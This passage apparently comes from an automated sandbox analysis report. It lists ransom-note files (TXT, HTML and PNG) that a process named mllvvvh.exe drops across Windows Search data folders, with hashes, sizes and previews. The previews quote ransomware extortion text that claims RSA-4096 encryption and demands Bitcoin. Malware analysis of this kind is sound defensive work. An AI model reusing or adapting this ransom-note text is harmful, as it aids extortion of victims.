                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\SecStore\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):8388
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5u
                  MD5:8030E2957B3B2A6685152C405FF4388D
                  SHA1:30E1832D030C7AD1C692924707ACE545637F12F0
                  SHA-256:1B7333F5CCE4CA0D51CB2E15717421ED84DDFE684DD264A3C750B240F7ADD4C2
                  SHA-512:DD6A7C9685A84743044BD8AA00A6C71B68E8B0257593EF43F4B7D9A735FCB373C4433EB3C893072764E1A9F752DFADED2AE17A8D44D83D174877F5F91B836980
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):39280
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:664D8ACC6D2F9F4B76F9F81C97E6A091
                  SHA1:B88D3486CBFAB331F09CF03AB0E309D7B9796878
                  SHA-256:51F0C6EFD031D946D795C189CD0F0E5F9F459358E8D87F8E94B78F49F1B0F78D
                  SHA-512:04B88B4747E742152CC6E75581A4D53777D3B05599F23867EBAE0F4163A2C9354F20A3D9104F277A49F9762BB34C5859127C676E8C98E7568D01EC36094042CB
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):338760
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifKrCifA
                  MD5:53A382FDC632097B36E90F7F51340A73
                  SHA1:524B5598A052A5D80CE2C55B88EC632BC37CE2EF
                  SHA-256:549C507EF017E234B89D0B901B59CF7B0F8F90C11220DF987E8C06BB6D8272D6
                  SHA-512:5FE80827BDE146B5ECE29654BB0638D350221575597781FE4C5677E56CE092D3E46BC7610EDE641F910D9F5D9A55585AE49FF77C9DC3B2445B00294069671973
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):10485
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5u
                  MD5:80CA2F04E38E47405C8711796F2872C0
                  SHA1:B93604437AA672E77266E80F252ECDF2E60CA273
                  SHA-256:44A0EE085B96A05215F63B5BCC610B294519E31113AD8E6709F79CE0B6C1DEDD
                  SHA-512:EB5FD717FACF5C526F32BC1F7294AB19A40CC8B4117D2BD1A46EBBD894A896934A6E2A03D421AEB03BA189D9F734A0FD999163881EBDE2E5343A5CD23A178DEB
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):47136
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:D07CCBE769EBEC1D8CAE6017EC1F6169
                  SHA1:CA2A02FA59BB9D8C83A291D0682C71F923F117CD
                  SHA-256:4C4DF07203027D038DE80EA251D9B840ED5616DF188FDD5951F3807D1CC39D8D
                  SHA-512:37705E78B8C0632084F0C61041DC613A5F8ABC34F3DE867D0F4694A86ABBC373187B5095B135ECD3317CFCFD18D7A6B78424DA7F3BD5DCDF5A47FC23AF5D2C7F
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):406512
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4A:xrCifKrCifKrCifKrCifKrCifKrCifA
                  MD5:FC226523469253DE87A69B9BC142420B
                  SHA1:2B1F22D1A0A8428CC1A11ACFCB20894CA237F090
                  SHA-256:D9A1F01832BD9E2821C01EB6DD3BE4B7CD6D3610C2AD7ED8B801F1B4911CA7D5
                  SHA-512:623156984045EA37DE411392D73C641CADDF2C27DE250851A42778E13238AFF348E24CF089FFBBCA8EF66B808932B8AAD30587A1FCD2752FA7DFA6A64E7D39AA
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):12582
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:817D02692841B622ADC493D624983933
                  SHA1:E979DEAF02039B281A610353018D89440ACF8C6C
                  SHA-256:509A256004A45EE5A235854462E8E2FECC4C9B8B8D5CDA8FB260BCA59282FDB3
                  SHA-512:C36FED2F576DCDCB34802274F1B6A43B8DE01C2D4116446A38761D39FC1A0A2B182887CA322E96EF2E749F48DB6DACBB5146FF56DDA440E01B32521A42E02085
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Search\Data\Applications\Windows\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):47136
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:D07CCBE769EBEC1D8CAE6017EC1F6169
                  SHA1:CA2A02FA59BB9D8C83A291D0682C71F923F117CD
                  SHA-256:4C4DF07203027D038DE80EA251D9B840ED5616DF188FDD5951F3807D1CC39D8D
                  SHA-512:37705E78B8C0632084F0C61041DC613A5F8ABC34F3DE867D0F4694A86ABBC373187B5095B135ECD3317CFCFD18D7A6B78424DA7F3BD5DCDF5A47FC23AF5D2C7F
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Search\Data\Applications\Windows\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):406512
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4A:xrCifKrCifKrCifKrCifKrCifKrCifA
                  MD5:FC226523469253DE87A69B9BC142420B
                  SHA1:2B1F22D1A0A8428CC1A11ACFCB20894CA237F090
                  SHA-256:D9A1F01832BD9E2821C01EB6DD3BE4B7CD6D3610C2AD7ED8B801F1B4911CA7D5
                  SHA-512:623156984045EA37DE411392D73C641CADDF2C27DE250851A42778E13238AFF348E24CF089FFBBCA8EF66B808932B8AAD30587A1FCD2752FA7DFA6A64E7D39AA
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Search\Data\Applications\Windows\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):12582
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:817D02692841B622ADC493D624983933
                  SHA1:E979DEAF02039B281A610353018D89440ACF8C6C
                  SHA-256:509A256004A45EE5A235854462E8E2FECC4C9B8B8D5CDA8FB260BCA59282FDB3
                  SHA-512:C36FED2F576DCDCB34802274F1B6A43B8DE01C2D4116446A38761D39FC1A0A2B182887CA322E96EF2E749F48DB6DACBB5146FF56DDA440E01B32521A42E02085
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Search\Data\Applications\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):54992
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:768:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VSnk3VS+:ak3gnk3gnk3gnk3gnk3gnk3gnk3g+
                  MD5:28C08EE848FD5F14B8DBA817F17C9336
                  SHA1:B7FBA910C0A7EB9FDB4034E57D7D8FC63713B6BE
                  SHA-256:EDA172BB4D85EB62F5D6B2D53209FF20914DD2FB194FC3AFAE2DE02FA98A2ABA
                  SHA-512:630BDC87D1C56ADC27A649BE3F346C0C2B89981679D967B2B480A85497A26515C3CFDA0AFF3301BD97ED6110ECCD39CF442EB9A7BE1BEF174FCC065710FDD2D4
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Search\Data\Applications\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):474264
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCio
                  MD5:9F7AA7DF2FF97FF4C39D0013E8BEC5EC
                  SHA1:AF430020BC11A057D0F53ECF4CBE1B4B3AE74E99
                  SHA-256:895B6D3FB59778B797A1B7356369BDB212F64D2A8A6AFE2F3A3DA591F61D6D46
                  SHA-512:4ECB4E9DA298380C9C00B63D5BE07AD7854AE2C2E0E2F679C9208FF12A492D1838A25EDE517F355FA4DCCDC504A578A4F2BD5FDABA6C67CAFB732890744962F4
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Search\Data\Applications\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):14679
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:1DAD93A1FA0FF49DD69890F37658FFA6
                  SHA1:62AF9D0F4EC3B87B32F6F41968D1BC320A26D038
                  SHA-256:7EA693BB9567A525C46D4BF5922AF7C77E94E2019A3A105AFCDA6EB3D9033065
                  SHA-512:E2B5EFD5EA646265037F9057467EBB822009E91F2BCB097B17C1AFF25A09114B46E2737E6BC8C720853B56F44A364152FDC7DB35808B2008136E4509EEC3C62E
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Search\Data\Temp\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):54992
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:768:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VSnk3VS+:ak3gnk3gnk3gnk3gnk3gnk3gnk3g+
                  MD5:28C08EE848FD5F14B8DBA817F17C9336
                  SHA1:B7FBA910C0A7EB9FDB4034E57D7D8FC63713B6BE
                  SHA-256:EDA172BB4D85EB62F5D6B2D53209FF20914DD2FB194FC3AFAE2DE02FA98A2ABA
                  SHA-512:630BDC87D1C56ADC27A649BE3F346C0C2B89981679D967B2B480A85497A26515C3CFDA0AFF3301BD97ED6110ECCD39CF442EB9A7BE1BEF174FCC065710FDD2D4
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Search\Data\Temp\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):474264
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCio
                  MD5:9F7AA7DF2FF97FF4C39D0013E8BEC5EC
                  SHA1:AF430020BC11A057D0F53ECF4CBE1B4B3AE74E99
                  SHA-256:895B6D3FB59778B797A1B7356369BDB212F64D2A8A6AFE2F3A3DA591F61D6D46
                  SHA-512:4ECB4E9DA298380C9C00B63D5BE07AD7854AE2C2E0E2F679C9208FF12A492D1838A25EDE517F355FA4DCCDC504A578A4F2BD5FDABA6C67CAFB732890744962F4
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Search\Data\Temp\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):14679
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:1DAD93A1FA0FF49DD69890F37658FFA6
                  SHA1:62AF9D0F4EC3B87B32F6F41968D1BC320A26D038
                  SHA-256:7EA693BB9567A525C46D4BF5922AF7C77E94E2019A3A105AFCDA6EB3D9033065
                  SHA-512:E2B5EFD5EA646265037F9057467EBB822009E91F2BCB097B17C1AFF25A09114B46E2737E6BC8C720853B56F44A364152FDC7DB35808B2008136E4509EEC3C62E
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Search\Data\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):54992
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:768:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VSnk3VS+:ak3gnk3gnk3gnk3gnk3gnk3gnk3g+
                  MD5:28C08EE848FD5F14B8DBA817F17C9336
                  SHA1:B7FBA910C0A7EB9FDB4034E57D7D8FC63713B6BE
                  SHA-256:EDA172BB4D85EB62F5D6B2D53209FF20914DD2FB194FC3AFAE2DE02FA98A2ABA
                  SHA-512:630BDC87D1C56ADC27A649BE3F346C0C2B89981679D967B2B480A85497A26515C3CFDA0AFF3301BD97ED6110ECCD39CF442EB9A7BE1BEF174FCC065710FDD2D4
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
